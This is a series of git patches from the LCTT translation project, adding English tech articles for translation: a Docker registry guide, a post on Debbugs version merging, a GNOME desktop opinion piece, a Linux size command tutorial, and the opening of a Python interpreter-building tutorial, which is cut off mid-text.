+## Pushing and Pulling Images
+
+We now need to set up a repository to hold an image. This is a little bit different than Docker Hub which automatically creates a repository if one doesn't exist when you do a docker push. To create the repository, point your browser to https:// and then sign-in with your admin credentials when prompted. If you added a license to UCP, that license will automatically have been picked up by DTR. If not, make certain you upload your license now.
+
+Once you're in, click on the 'New Repository` button and create a new repository.
+
+We'll create a repo to hold Alpine linux, so type `alpine` in the name field, and click
+
+`Save` (it's labelled `Create` in DTR 2.5 and newer).
+
+Now let's go back to our shell and type the commands:
+
+```
+# Pull the latest version of Alpine Linux
+
+docker pull alpine:latest
+
+# Sign in to your new DTR instance
+
+docker login
+
+# Tag Alpine to be able to push it to your DTR
+
+docker tag alpine:latest /admin/alpine:latest
+
+# Push the image to DTR
+
+docker push /admin/alpine:latest
+```
+
+And that's it! We just pulled a copy of the latest Alpine Linux, re-tagged it so that we could store it inside of DTR, and then pushed it to our private registry. If you want to pull that image to a different Docker engine, set up your DTR certs as shown above, and issue the command:
+
+```
+# Pull the image from DTR
+
+docker pull /admin/alpine:latest
+```
+
+DTR has a lot of great image management features built right in such as image caching, mirroring, scanning, signing, and even automated supply chain policies. We'll leave these to future blog posts which we can explore in more detail.
+
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://blog.docker.com/2018/01/dtr/
+
+作者:[Patrick Devine;Rolf Neugebauer;Docker Core Engineering;Matt Bentley][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://blog.docker.com/author/pdevine/
+[1]:https://i1.wp.com/blog.docker.com/wp-content/uploads/ccd278d2-29c2-4866-8285-c2fe60b4bd5e-1.jpg?resize=965%2C452&ssl=1
+[2]:https://hub.docker.com/
+[3]:https://blog.docker.com/2016/08/securing-enterprise-software-supply-chain-using-docker/
+[4]:https://www.docker.com/trial
+[5]:https://store.docker.com/search?offering=enterprise&page=1&q=&type=edition
From a026e583d57491b7188a19148ffc89e834246810 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 19:38:27 +0800
Subject: [PATCH 247/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Debbugs=20Version?=
=?UTF-8?q?ing:=20Merging?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../20180108 Debbugs Versioning- Merging.md | 80 +++++++++++++++++++
1 file changed, 80 insertions(+)
create mode 100644 sources/tech/20180108 Debbugs Versioning- Merging.md
diff --git a/sources/tech/20180108 Debbugs Versioning- Merging.md b/sources/tech/20180108 Debbugs Versioning- Merging.md
new file mode 100644
index 0000000000..ea479acc75
--- /dev/null
+++ b/sources/tech/20180108 Debbugs Versioning- Merging.md
@@ -0,0 +1,80 @@
+Debbugs Versioning: Merging
+======
+One of the key features of Debbugs, the [bug tracking system Debian uses][1], is its ability to figure out which bugs apply to which versions of a package by tracking package uploads. This system generally works well, but when a package maintainer's workflow doesn't match the assumptions of Debbugs, unexpected things can happen. In this post, I'm going to:
+
+ 1. introduce how Debbugs tracks versions
+ 2. provide an example of a merge-based workflow which Debbugs doesn't handle well
+ 3. provide some suggestions on what to do in this case
+
+
+
+### Debbugs Versioning
+
+Debbugs tracks versions using a set of one or more [rooted trees][2] which it builds from the ordering of debian/changelog entries. In the simplist case, every upload of a Debian package has changelogs in the same order, and each upload adds just one version. For example, in the case of [dgit][3], to start with the package has this (abridged) version tree:
+
+![][4]
+
+the next upload, 3.13, has a changelog with this version ordering: `3.13 3.12 3.11 3.10`, which causes the 3.13 version to be added as a descendant of 3.12, and the version tree now looks like this:
+
+![][5]
+
+dgit is being developed while also being used, so new versions with potentially disruptive changes are uploaded to experimental while production versions are uploaded to unstable. For example, the 4.0 experimental upload was based on the 3.10 version, with the changelog ordering `4.0 3.10`. The tree now has two branches, but everything seems as you would expect:
+
+![][6]
+
+### Merge based workflows
+
+Bugfixes in the maintenance version of dgit also are made to the experimental package by merging changes from the production version using git. In this case, some changes which were present in the 3.12 and 3.11 versions are merged using git, corresponds to a git merge flow like this:
+
+![][7]
+
+If an upload is prepared with changelog ordering `4.1 4.0 3.12 3.11 3.10`, Debbugs combines this new changelog ordering with the previously known tree, to produce this version tree:
+
+![][8]
+
+This looks a bit odd; what happened? Debbugs walks through the new changelog, connecting each of the new versions to the previous version if and only if that version is not already an ancestor of the new version. Because the changelog says that 3.12 is the ancestor of 4.0, that's where the `4.1 4.0` version tree is connected.
+
+Now, when 4.2 is uploaded, it has the changelog ordering (based on time) `4.2 3.13 4.1 4.0 3.12 3.11 3.10`, which corresponds to this git merge flow:
+
+![][9]
+
+Debbugs adds in 3.13 as an ancestor of 4.2, and because 4.1 was not an ancestor of 3.13 in the previous tree, 4.1 is added as an ancestor of 3.13. This results in the following graph:
+
+![][10]
+
+Which doesn't seem particularly helpful, because
+
+![][11]
+
+is probably the tree that more closely resembles reality.
+
+### Suggestions on what to do
+
+Why does this even matter? Bugs which are found in 3.11, and fixed in 3.12 now show up as being found in 4.0 after the 4.1 release, though they weren't found in 4.0 before that release. It also means that 3.13 now shows up as having all of the bugs fixed in 4.2, which might not be what is meant.
+
+To avoid this, my suggestion is to order the entries in changelogs in the same order that the version graph should be traversed from the leaf version you are releasing to the root. So if the previous version tree is what is wanted, 3.13 should have a changelog with ordering `3.13 3.12 3.11 3.10`, and 4.2 should have a changelog with ordering `4.2 4.1 4.0 3.10`.
+
+What about making the BTS support DAGs which are not trees? I think something like this would be useful, but I don't personally have a good idea on how this could be specified using the changelog or how bug fixed/found/absent should be propagated in the DAG. If you have better ideas, email me!
+
+--------------------------------------------------------------------------------
+
+via: https://www.donarmstrong.com/posts/debbugs_merge_versions/
+
+作者:[Don Armstrong][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.donarmstrong.com/
+[1]:https://bugs.debian.org
+[2]:https://en.wikipedia.org/wiki/Tree_%28graph_theory%29#Forest
+[3]:https://packages.debian.org/dgit
+[4]:https://www.donarmstrong.com/graph-5d3f559f0fb850f47a5ea54c62b96da18bba46b8.png
+[5]:https://www.donarmstrong.com/graph-04a0cac92e522aa8816397090f0a23ef51e49379.png
+[6]:https://www.donarmstrong.com/graph-65493d1d56cbf3a32fc6e061d4d933f609d0dd9d.png
+[7]:https://www.donarmstrong.com/graph-cc7df2f6e47656a87ca10d313e65a8e3d55fb937.png
+[8]:https://www.donarmstrong.com/graph-94b259ce6dd4d28c04d692c72f6e021622b5b33a.png
+[9]:https://www.donarmstrong.com/graph-72f98ac7aa28e7dd40aaccf7742359f5dd2de378.png
+[10]:https://www.donarmstrong.com/graph-70ebe94be503db5ba97c4693f9e00fbb1dc3c9f7.png
+[11]:https://www.donarmstrong.com/graph-3f8db089ab21b48bcae9d536c1887b3bc6fc4bcb.png
From c7b455b6288b1e4a8fa2863f3f6fb711886a83a7 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 19:45:07 +0800
Subject: [PATCH 248/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20You=20GNOME=20it:?=
=?UTF-8?q?=20Windows=20and=20Apple=20devs=20get=20a=20compelling=20reason?=
=?UTF-8?q?=20to=20turn=20to=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...et a compelling reason to turn to Linux.md | 70 +++++++++++++++++++
1 file changed, 70 insertions(+)
create mode 100644 sources/tech/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md
diff --git a/sources/tech/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md b/sources/tech/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md
new file mode 100644
index 0000000000..ed7e2650ce
--- /dev/null
+++ b/sources/tech/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md
@@ -0,0 +1,70 @@
+You GNOME it: Windows and Apple devs get a compelling reason to turn to Linux
+======
+
+![](https://regmedia.co.uk/2018/01/05/shutterstock_penguins_celebrate.jpg?x=442&y=293&crop=1)
+
+**Open Source Insider** The biggest open source story of 2017 was unquestionably Canonical's decision to stop developing its Unity desktop and move Ubuntu to the GNOME Shell desktop.
+
+What made the story that much more entertaining was how well Canonical pulled off the transition. [Ubuntu 17.10][1] was quite simply one of the best releases of the year and certainly the best release Ubuntu has put out in a good long time. Of course since 17.10 was not an LTS release, the more conservative users - which may well be the majority in Ubuntu's case - still haven't made the transition.
+
+![Woman takes a hammer to laptop][2]
+
+Ubuntu 17.10 pulled: Linux OS knackers laptop BIOSes, Intel kernel driver fingered
+
+Canonical pulled Ubuntu 17.10 downloads from its website last month due to a "bug" that could corrupt BIOS settings on some laptops. Lenovo laptops appear to be the most common source of problems, though users also reported problems with Acer and Dell.
+
+The bug is actually a result of Canonical's decision to enable the Intel SPI driver, which allows BIOS firmware updates. That sounds nice, but it's not ready for prime time. Clearly. It's also clearly labeled as such and disabled in the upstream kernel. For whatever reason Canonical enabled it and, as it says on the tin, the results were unpredictable.
+
+According to chatter on the Ubuntu mailing list, a fix is a few days away, with testing happening now. In the mean time, if you've been affected (for what it's worth, I have a Lenovo laptop and was *not* affected) OMGUbuntu has some [instructions that might possibly help][4].
+
+It's a shame it happened because the BIOS issue seriously mars what was an otherwise fabulous release of Ubuntu.
+
+Meanwhile, the repercussions of Canonical's move to GNOME are still being felt in the open source world and I believe this will continue to be one of the biggest stories in 2018 for several reasons. The first is that so many have yet to actually make the move to GNOME-based Ubuntu. That will change with 18.04, which is an LTS release set to arrive later this year. Users upgrading between LTS releases will get their first taste of Ubuntu with GNOME come April.
+
+### You got to have standards: Suddenly it's much, much more accessible
+
+The second, and perhaps much bigger, reason Ubuntu without Unity will continue to be a big story in the foreseeable future is that with Ubuntu using GNOME Shell, almost all the major distributions out there now ship primarily with GNOME, making GNOME Shell the de facto standard Linux desktop. That's not to say GNOME is the only option, but for a new user, landing on the Ubuntu downloads webpage or the Fedora download page or the Debian download page, the default links will get you GNOME Shell on the desktop.
+
+That makes it possible for Linux and open source advocates to make a more appealing case for the platform. The ubiquity of GNOME is something that hasn't been the case previously. And it may not be good news for KDE fans, but I believe it's going to have a profound impact on the future of desktop Linux and open source development more generally because it dovetails nicely with something that I believe has been a huge story in 2017 and will continue to be a huge story in 2018 - Flatpak/Snap packages.
+
+Combine a de facto standard desktop with a standard means of packaging applications and you have a platform that's just as easy to develop for as any other, say Windows or macOS.
+
+The development tools in GNOME, particularly the APIs and GNOME Builder tool that arrived earlier this year with GNOME 3.20, offer developers a standardised means of targeting the Linux desktop in a way that simply hasn't been possible until now. Combine that with the ability to package applications _independent of distro_ and you have a much more compelling platform for developers.
+
+That just might mean that developers not currently targeting Linux will be willing to take another look.
+
+Now this potential utopia has some downsides. As already noted it leaves KDE fans a little out in the cold. It also leaves my favourite distro looking a little less necessary than it used to. I won't be abandoning Arch Linux any time soon, but I'll have a lot harder time making a solid case for Arch with Flatpak/Snap packages having more or less eliminated the need for the Arch User Repository. That's not going to happen overnight, but I do think it will eventually get there.
+
+### What to look forward to...
+
+There are two other big stories to watch in 2018. The first is Amazon Linux 2, Amazon's new home-grown Linux distro, based - loosely it seems - on RHEL 7. While Amazon Linux 2 screams vendor lock-in to me, it will certainly appeal to the millions of companies already heavily invested in the AWS system.
+
+It also appears, from my limited testing, to offer some advantages over other images on EC2. One is speed: AL2 has been tuned to the AWS environment, but perhaps the bigger advantage is the uniformity and ease of moving from development to production entirely through identical containers.
+
+![Still from Mr Robot][5]
+
+ Mozilla's creepy Mr Robot stunt in Firefox flops in touching tribute to TV show's 2nd season
+
+The last story worth keeping an eye on is Firefox. The once, and possibly future, darling of open source development had something of a rough year. Firefox 57 with the Quantum code re-write was perhaps the most impressive release since Firefox 1.0, but that was followed up by the rather disastrous Mr Robot tie-in promo fiasco that installed unwanted plugins in users situations, an egregious breach of trust that would have made even Chrome developers blush.
+
+I think there are going to be a lot more of these sorts of gaffes in 2018. Hopefully not involving Firefox, but as open source projects struggle to find different ways to fund themselves and attain higher levels of recognition, we should expect there to be plenty of ill-advised stunts of this sort.
+
+I'd say pop some popcorn, because the harder that open source projects try to find money, the more sparks - and disgruntled users - are going fly. ®
+
+--------------------------------------------------------------------------------
+
+via: https://www.theregister.co.uk/2018/01/08/desktop_linux_open_source_standards_accessible/
+
+作者:[Scott Gilbertson][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:
+[1]:https://www.theregister.co.uk/2017/10/20/ubuntu_1710/
+[2]:https://regmedia.co.uk/2017/12/14/shutterstock_laptop_hit.jpg?x=174&y=115&crop=1
+[3]:https://www.theregister.co.uk/2017/12/21/ubuntu_lenovo_bios/
+[4]:http://www.omgubuntu.co.uk/2018/01/ubuntu-17-10-lenovo-fix
+[5]:https://regmedia.co.uk/2017/12/18/mr_robot_still.jpg?x=174&y=115&crop=1
+[6]:https://www.theregister.co.uk/2017/12/18/mozilla_mr_robot_firefox_promotion/
From 6b15e9bf1fa04f28955bb0a109eac7cd02a99799 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 19:45:49 +0800
Subject: [PATCH 249/371] add done: 20180108 You GNOME it- Windows and Apple
devs get a compelling reason to turn to Linux.md
---
...ows and Apple devs get a compelling reason to turn to Linux.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename sources/{tech => talk}/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md (100%)
diff --git a/sources/tech/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md b/sources/talk/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md
similarity index 100%
rename from sources/tech/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md
rename to sources/talk/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md
From 6e06d7710ca595975610729aebe7762b3ae1cf05 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 19:53:21 +0800
Subject: [PATCH 250/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20size=20Co?=
=?UTF-8?q?mmand=20Tutorial=20for=20Beginners=20(6=20Examples)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...and Tutorial for Beginners (6 Examples).md | 143 ++++++++++++++++++
1 file changed, 143 insertions(+)
create mode 100644 sources/tech/20180109 Linux size Command Tutorial for Beginners (6 Examples).md
diff --git a/sources/tech/20180109 Linux size Command Tutorial for Beginners (6 Examples).md b/sources/tech/20180109 Linux size Command Tutorial for Beginners (6 Examples).md
new file mode 100644
index 0000000000..4467e442c5
--- /dev/null
+++ b/sources/tech/20180109 Linux size Command Tutorial for Beginners (6 Examples).md
@@ -0,0 +1,143 @@
+translating by lujun9972
+Linux size Command Tutorial for Beginners (6 Examples)
+======
+
+As some of you might already know, an object or executable file in Linux consists of several sections (like txt and data). In case you want to know the size of each section, there exists a command line utility - dubbed **size** \- that provides you this information. In this tutorial, we will discuss the basics of this tool using some easy to understand examples.
+
+But before we do that, it's worth mentioning that all examples mentioned in this article have been tested on Ubuntu 16.04LTS.
+
+## Linux size command
+
+The size command basically lists section sizes as well as total size for the input object file(s). Here's the syntax for the command:
+```
+size [-A|-B|--format=compatibility]
+ [--help]
+ [-d|-o|-x|--radix=number]
+ [--common]
+ [-t|--totals]
+ [--target=bfdname] [-V|--version]
+ [objfile...]
+```
+
+And here's how the man page describes this utility:
+```
+The GNU size utility lists the section sizes---and the total size---for each of the object or archive files objfile in its argument list. By default, one line of output is generated for each object file or each module in an archive.
+
+objfile... are the object files to be examined. If none are specified, the file "a.out" will be used.
+```
+
+Following are some Q&A-styled examples that'll give you a better idea about how the size command works.
+
+## Q1. How to use size command?
+
+Basic usage of size is very simple. All you have to do is to pass the object/executable file name as input to the tool. Following is an example:
+
+```
+size apl
+```
+
+Following is the output the above command produced on our system:
+
+[![How to use size command][1]][2]
+
+The first three entries are for text, data, and bss sections, with their corresponding sizes. Then comes the total in decimal and hexadecimal formats. And finally, the last entry is for the filename.
+
+## Q2. How to switch between different output formats?
+
+The default output format, the man page for size says, is similar to the Berkeley's format. However, if you want, you can go for System V convention as well. For this, you'll have to use the **\--format** option with SysV as value.
+
+```
+size apl --format=SysV
+```
+
+Here's the output in this case:
+
+[![How to switch between different output formats][3]][4]
+
+## Q3. How to switch between different size units?
+
+By default, the size of sections is displayed in decimal. However, if you want, you can have this information on octal as well as hexadecimal. For this, use the **-o** and **-x** command line options.
+
+[![How to switch between different size units][5]][6]
+
+Here's what the man page says about these options:
+```
+-d
+-o
+-x
+--radix=number
+
+Using one of these options, you can control whether the size of each section is given in decimal
+(-d, or --radix=10); octal (-o, or --radix=8); or hexadecimal (-x, or --radix=16). In
+--radix=number, only the three values (8, 10, 16) are supported. The total size is always given in
+two radices; decimal and hexadecimal for -d or -x output, or octal and hexadecimal if you're using
+-o.
+```
+
+## Q4. How to make size command show totals of all object files?
+
+If you are using size to find out section sizes for multiple files in one go, then if you want, you can also have the tool provide totals of all column values. You can enable this feature using the **-t** command line option.
+
+```
+size -t [file1] [file2] ...
+```
+
+The following screenshot shows this command line option in action:
+
+[![How to make size command show totals of all object files][7]][8]
+
+The last row in the output has been added by the **-t** command line option.
+
+## Q5. How to make size print total size of common symbols in each file?
+
+If you are running the size command with multiple input files, and want the command to display common symbols in each file, then you can do this with the **\--common** command line option.
+
+```
+size --common [file1] [file2] ...
+```
+
+It's also worth mentioning that when using Berkeley format these are included in the bss size.
+
+## Q6. What are the other available command line options?
+
+Aside from the ones discussed until now, size also offers some generic command line options like **-v** (for version info) and **-h** (for summary of eligible arguments and options)
+
+[![What are the other available command line options][9]][10]
+
+In addition, you can also make size read command-line options from a file. This you can do using the **@file** option. Following are some details related to this option:
+```
+The options read are inserted in place of the original @file option. If file does not exist, or
+ cannot be read, then the option will be treated literally, and not removed. Options in file are
+separated by whitespace. A whitespace character may be included in an option by surrounding the
+entire option in either single or double quotes. Any character (including a backslash) may be
+included by prefixing the character to be included with a backslash. The file may itself contain
+additional @file options; any such options will be processed recursively.
+```
+
+## Conclusion
+
+One thing is clear, the size command isn't for everybody. It's aimed at only those who deal with the structure of object/executable files in Linux. So if you are among the target audience, practice the options we've discussed here, and you should be ready to use the tool on daily basis. For more information on size, head to its [man page][11].
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-size-command/
+
+作者:[Himanshu Arora][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/command-tutorial/size-basic-usage.png
+[2]:https://www.howtoforge.com/images/command-tutorial/big/size-basic-usage.png
+[3]:https://www.howtoforge.com/images/command-tutorial/size-format-option.png
+[4]:https://www.howtoforge.com/images/command-tutorial/big/size-format-option.png
+[5]:https://www.howtoforge.com/images/command-tutorial/size-o-x-options.png
+[6]:https://www.howtoforge.com/images/command-tutorial/big/size-o-x-options.png
+[7]:https://www.howtoforge.com/images/command-tutorial/size-t-option.png
+[8]:https://www.howtoforge.com/images/command-tutorial/big/size-t-option.png
+[9]:https://www.howtoforge.com/images/command-tutorial/size-v-x1.png
+[10]:https://www.howtoforge.com/images/command-tutorial/big/size-v-x1.png
+[11]:https://linux.die.net/man/1/size
From 3405e48d33c1472a1813d381d0ef2875fe6f4366 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 20:01:33 +0800
Subject: [PATCH 251/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Let=E2=80=99s=20B?=
=?UTF-8?q?uild=20A=20Simple=20Interpreter.=20Part=201.?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...t-s Build A Simple Interpreter. Part 1..md | 341 ++++++++++++++++++
1 file changed, 341 insertions(+)
create mode 100644 sources/tech/20150615 Let-s Build A Simple Interpreter. Part 1..md
diff --git a/sources/tech/20150615 Let-s Build A Simple Interpreter. Part 1..md b/sources/tech/20150615 Let-s Build A Simple Interpreter. Part 1..md
new file mode 100644
index 0000000000..4c0d541a5a
--- /dev/null
+++ b/sources/tech/20150615 Let-s Build A Simple Interpreter. Part 1..md
@@ -0,0 +1,341 @@
+Let’s Build A Simple Interpreter. Part 1.
+======
+
+
+> **" If you don't know how compilers work, then you don't know how computers work. If you're not 100% sure whether you know how compilers work, then you don't know how they work."** -- Steve Yegge
+
+There you have it. Think about it. It doesn't really matter whether you're a newbie or a seasoned software developer: if you don't know how compilers and interpreters work, then you don't know how computers work. It's that simple.
+
+So, do you know how compilers and interpreters work? And I mean, are you 100% sure that you know how they work? If you don't. ![][1]
+
+Or if you don't and you're really agitated about it. ![][2]
+
+Do not worry. If you stick around and work through the series and build an interpreter and a compiler with me you will know how they work in the end. And you will become a confident happy camper too. At least I hope so. ![][3]
+
+Why would you study interpreters and compilers? I will give you three reasons.
+
+ 1. To write an interpreter or a compiler you have to have a lot of technical skills that you need to use together. Writing an interpreter or a compiler will help you improve those skills and become a better software developer. As well, the skills you will learn are useful in writing any software, not just interpreters or compilers.
+ 2. You really want to know how computers work. Often interpreters and compilers look like magic. And you shouldn't be comfortable with that magic. You want to demystify the process of building an interpreter and a compiler, understand how they work, and get in control of things.
+ 3. You want to create your own programming language or domain specific language. If you create one, you will also need to create either an interpreter or a compiler for it. Recently, there has been a resurgence of interest in new programming languages. And you can see a new programming language pop up almost every day: Elixir, Go, Rust just to name a few.
+
+
+
+
+Okay, but what are interpreters and compilers?
+
+The goal of an **interpreter** or a **compiler** is to translate a source program in some high-level language into some other form. Pretty vague, isn 't it? Just bear with me, later in the series you will learn exactly what the source program is translated into.
+
+At this point you may also wonder what the difference is between an interpreter and a compiler. For the purpose of this series, let's agree that if a translator translates a source program into machine language, it is a **compiler**. If a translator processes and executes the source program without translating it into machine language first, it is an **interpreter**. Visually it looks something like this:
+
+![][4]
+
+I hope that by now you're convinced that you really want to study and build an interpreter and a compiler. What can you expect from this series on interpreters?
+
+Here is the deal. You and I are going to create a simple interpreter for a large subset of [Pascal][5] language. At the end of this series you will have a working Pascal interpreter and a source-level debugger like Python's [pdb][6].
+
+You might ask, why Pascal? For one thing, it's not a made-up language that I came up with just for this series: it's a real programming language that has many important language constructs. And some old, but useful, CS books use Pascal programming language in their examples (I understand that that's not a particularly compelling reason to choose a language to build an interpreter for, but I thought it would be nice for a change to learn a non-mainstream language :)
+
+Here is an example of a factorial function in Pascal that you will be able to interpret with your own interpreter and debug with the interactive source-level debugger that you will create along the way:
+```
+program factorial;
+
+function factorial(n: integer): longint;
+begin
+ if n = 0 then
+ factorial := 1
+ else
+ factorial := n * factorial(n - 1);
+end;
+
+var
+ n: integer;
+
+begin
+ for n := 0 to 16 do
+ writeln(n, '! = ', factorial(n));
+end.
+```
+
+The implementation language of the Pascal interpreter will be Python, but you can use any language you want because the ideas presented don't depend on any particular implementation language. Okay, let's get down to business. Ready, set, go!
+
+You will start your first foray into interpreters and compilers by writing a simple interpreter of arithmetic expressions, also known as a calculator. Today the goal is pretty minimalistic: to make your calculator handle the addition of two single digit integers like **3+5**. Here is the source code for your calculator, sorry, interpreter:
+
+```
+# Token types
+#
+# EOF (end-of-file) token is used to indicate that
+# there is no more input left for lexical analysis
+INTEGER, PLUS, EOF = 'INTEGER', 'PLUS', 'EOF'
+
+
+class Token(object):
+ def __init__(self, type, value):
+ # token type: INTEGER, PLUS, or EOF
+ self.type = type
+ # token value: 0, 1, 2. 3, 4, 5, 6, 7, 8, 9, '+', or None
+ self.value = value
+
+ def __str__(self):
+ """String representation of the class instance.
+
+ Examples:
+ Token(INTEGER, 3)
+ Token(PLUS '+')
+ """
+ return 'Token({type}, {value})'.format(
+ type=self.type,
+ value=repr(self.value)
+ )
+
+ def __repr__(self):
+ return self.__str__()
+
+
+class Interpreter(object):
+ def __init__(self, text):
+ # client string input, e.g. "3+5"
+ self.text = text
+ # self.pos is an index into self.text
+ self.pos = 0
+ # current token instance
+ self.current_token = None
+
+ def error(self):
+ raise Exception('Error parsing input')
+
+ def get_next_token(self):
+ """Lexical analyzer (also known as scanner or tokenizer)
+
+ This method is responsible for breaking a sentence
+ apart into tokens. One token at a time.
+ """
+ text = self.text
+
+ # is self.pos index past the end of the self.text ?
+ # if so, then return EOF token because there is no more
+ # input left to convert into tokens
+ if self.pos > len(text) - 1:
+ return Token(EOF, None)
+
+ # get a character at the position self.pos and decide
+ # what token to create based on the single character
+ current_char = text[self.pos]
+
+ # if the character is a digit then convert it to
+ # integer, create an INTEGER token, increment self.pos
+ # index to point to the next character after the digit,
+ # and return the INTEGER token
+ if current_char.isdigit():
+ token = Token(INTEGER, int(current_char))
+ self.pos += 1
+ return token
+
+ if current_char == '+':
+ token = Token(PLUS, current_char)
+ self.pos += 1
+ return token
+
+ self.error()
+
+ def eat(self, token_type):
+ # compare the current token type with the passed token
+ # type and if they match then "eat" the current token
+ # and assign the next token to the self.current_token,
+ # otherwise raise an exception.
+ if self.current_token.type == token_type:
+ self.current_token = self.get_next_token()
+ else:
+ self.error()
+
+ def expr(self):
+ """expr -> INTEGER PLUS INTEGER"""
+ # set current token to the first token taken from the input
+ self.current_token = self.get_next_token()
+
+ # we expect the current token to be a single-digit integer
+ left = self.current_token
+ self.eat(INTEGER)
+
+ # we expect the current token to be a '+' token
+ op = self.current_token
+ self.eat(PLUS)
+
+ # we expect the current token to be a single-digit integer
+ right = self.current_token
+ self.eat(INTEGER)
+ # after the above call the self.current_token is set to
+ # EOF token
+
+ # at this point INTEGER PLUS INTEGER sequence of tokens
+ # has been successfully found and the method can just
+ # return the result of adding two integers, thus
+ # effectively interpreting client input
+ result = left.value + right.value
+ return result
+
+
+def main():
+ while True:
+ try:
+ # To run under Python3 replace 'raw_input' call
+ # with 'input'
+ text = raw_input('calc> ')
+ except EOFError:
+ break
+ if not text:
+ continue
+ interpreter = Interpreter(text)
+ result = interpreter.expr()
+ print(result)
+
+
+if __name__ == '__main__':
+ main()
+```
+
+
+Save the above code into calc1.py file or download it directly from [GitHub][7]. Before you start digging deeper into the code, run the calculator on the command line and see it in action. Play with it! Here is a sample session on my laptop (if you want to run the calculator under Python3 you will need to replace raw_input with input):
+```
+$ python calc1.py
+calc> 3+4
+7
+calc> 3+5
+8
+calc> 3+9
+12
+calc>
+```
+
+For your simple calculator to work properly without throwing an exception, your input needs to follow certain rules:
+
+ * Only single digit integers are allowed in the input
+ * The only arithmetic operation supported at the moment is addition
+ * No whitespace characters are allowed anywhere in the input
+
+
+
+Those restrictions are necessary to make the calculator simple. Don't worry, you'll make it pretty complex pretty soon.
+
+Okay, now let's dive in and see how your interpreter works and how it evaluates arithmetic expressions.
+
+When you enter an expression 3+5 on the command line your interpreter gets a string "3+5". In order for the interpreter to actually understand what to do with that string it first needs to break the input "3+5" into components called **tokens**. A **token** is an object that has a type and a value. For example, for the string "3" the type of the token will be INTEGER and the corresponding value will be integer 3.
+
+The process of breaking the input string into tokens is called **lexical analysis**. So, the first step your interpreter needs to do is read the input of characters and convert it into a stream of tokens. The part of the interpreter that does it is called a **lexical analyzer** , or **lexer** for short. You might also encounter other names for the same component, like **scanner** or **tokenizer**. They all mean the same: the part of your interpreter or compiler that turns the input of characters into a stream of tokens.
+
+The method get_next_token of the Interpreter class is your lexical analyzer. Every time you call it, you get the next token created from the input of characters passed to the interpreter. Let's take a closer look at the method itself and see how it actually does its job of converting characters into tokens. The input is stored in the variable text that holds the input string and pos is an index into that string (think of the string as an array of characters). pos is initially set to 0 and points to the character '3'. The method first checks whether the character is a digit and if so, it increments pos and returns a token instance with the type INTEGER and the value set to the integer value of the string '3', which is an integer 3:
+
+![][8]
+
+The pos now points to the '+' character in the text. The next time you call the method, it tests if a character at the position pos is a digit and then it tests if the character is a plus sign, which it is. As a result the method increments pos and returns a newly created token with the type PLUS and value '+':
+
+![][9]
+
+The pos now points to character '5'. When you call the get_next_token method again the method checks if it's a digit, which it is, so it increments pos and returns a new INTEGER token with the value of the token set to integer 5: ![][10]
+
+Because the pos index is now past the end of the string "3+5" the get_next_token method returns the EOF token every time you call it:
+
+![][11]
+
+Try it out and see for yourself how the lexer component of your calculator works:
+```
+>>> from calc1 import Interpreter
+>>>
+>>> interpreter = Interpreter('3+5')
+>>> interpreter.get_next_token()
+Token(INTEGER, 3)
+>>>
+>>> interpreter.get_next_token()
+Token(PLUS, '+')
+>>>
+>>> interpreter.get_next_token()
+Token(INTEGER, 5)
+>>>
+>>> interpreter.get_next_token()
+Token(EOF, None)
+>>>
+```
+
+So now that your interpreter has access to the stream of tokens made from the input characters, the interpreter needs to do something with it: it needs to find the structure in the flat stream of tokens it gets from the lexer get_next_token. Your interpreter expects to find the following structure in that stream: INTEGER -> PLUS -> INTEGER. That is, it tries to find a sequence of tokens: integer followed by a plus sign followed by an integer.
+
